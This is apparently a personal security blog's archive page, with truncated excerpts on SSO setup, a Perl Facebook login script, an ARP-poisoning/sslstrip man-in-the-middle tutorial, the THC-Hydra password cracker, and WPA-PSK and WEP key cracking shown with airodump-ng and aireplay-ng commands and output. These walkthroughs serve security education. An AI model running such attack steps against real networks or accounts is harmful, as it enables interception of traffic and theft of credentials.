Archive for

Opensource IT Security Solutions

Implementation of SSO (Single-Sign-On) procedures according to ADAE’s Requirements for Telcos, ISPs, Banks, etc. SSO Apache Authentication Against Active Directory, SSO Proxy Squid Authentication Against Active Directory, SSO vsftpd Authentication Against Active Directory. Web Content Filtering and Anti Virus Services. Integration of OpenSSH with OpenLDAP, Kerberos, Active Directory standards (SSO) with full logging and replay … Continue reading

How to Authenticate against Facebook using Perl

#!/usr/bin/perl -w #How to Authenticate against Facebook using Perl #coded by Panagiotis Iliopoulos 20/2/2011 #apt-get install libcrypt-ssleay-perl use strict; use LWP::UserAgent; use HTTP::Cookies; my $fname=”fbkCookies.dat”; if (-e $fname) { unlink $fname;} my $email=”user@domain name”; my $password=”yourpassword”; my $user_agent = ‘Mozilla/5.0 (Linux; U; Android 2.2; en-us; Ideos Build/FRF91) AppleWebKit/533.1 Mobile Safari/533.1’; my %postLoginData=(        … Continue reading

ARP Poisoning – mitm against faceb00k, Gma1L, etc using sslstrip

THIS IS FOR EDUCATIONAL PURPOSES ONLY !!! This method doesnt expose any certiface warning to the user since the SSL connections are turned into plaintext ones. So, never use corporate or public LANs, WiFi Hotspots to access eshops, your personal email,  faceb00k or case sensitive data. 0) Install ettercap root@pilio-laptop:/# apt-get install ettercap 1) we download … Continue reading

C API OpenSSL / libcrypto sample code

#include <stdio.h> #include <string.h> #include <openssl/sha.h> int main() { unsigned char ibuf[] = “Hello, World“; unsigned char obuf[20]; SHA1(ibuf, strlen(ibuf), obuf); int i; for (i = 0; i < 20; i++) { printf(“%02x “, obuf[i]); } printf(“\n”); return 0; } [root@node1 tmp]# gcc pilio.c -Wall -lcrypto -o pilio [root@node1 tmp]# ./pilio 90 7d 14 fb … Continue reading

THC-Hydra – The ultimate security assessment tool for NW Services

A very fast network logon cracker which supports; AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY (Basic, DIGEST-MD5, NTLM), HTTPS-FORM-GET, HTTPS-FORM-POST, LDAP (Simple), HTTPS-GET, HTTPS-HEAD, ICQ, IMAP (Clear, Login, Plain, CRAM-MD5, CRAM-SHA1, CRAM-SHA256, DIGEST-MD5, NTLM), MS-SQL, MYSQL, NCP, NNTP, PCNFS, POP3 (Clear, APOP, Login, Plain, CRAM-MD5, CRAM-SHA1, CRAM-SHA256, DIGEST-MD5, NTLM), POSTGRES, REXEC, SAP/R3, … Continue reading

WiFi – WPA-PSK Security assessment with Pre-computed hashes

This post is for educational purposes only !!! On my eeepc i reached 36492.90 keys/second #sudo -i #apt-get install libssl-dev libpcap0.8-dev #wget http://wirelessdefence.org/Contents/Files/cowpatty-4.6.tgz #tar -xzf cowpatty-4.6.tgz #cd cowpatty-4.6 root@pilio-laptop:/cowpatty/cowpatty-4.6# make cc -pipe -Wall -DOPENSSL  -O2 -g3 -ggdb   -c -o md5.o md5.c cc -pipe -Wall -DOPENSSL  -O2 -g3 -ggdb   -c -o sha1.o sha1.c cc -pipe -Wall -DOPENSSL  -O2 … Continue reading

WiFi WEP key security assessment

++++++++++++++ 1st terminal window +++++++++++++++++ #airmon-ng start wlan0 #airodump-ng –bssid D8:5D:4C:9D:AC:2D –channel 1 -w tp_link mon0 +++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++ 2nd terminal window ++++++++++++++ #aireplay-ng -1 0 -e TP-LINK_9DAC2D -a D8:5D:4C:9D:AC:2D -h 00:E0:4C:83:10:BF mon0 22:10:01  Waiting for beacon frame (BSSID: D8:5D:4C:9D:AC:2D) on channel 1 22:10:01  Sending Authentication Request (Open System) [ACK] 22:10:01  Authentication successful 22:10:01  Sending Association … Continue reading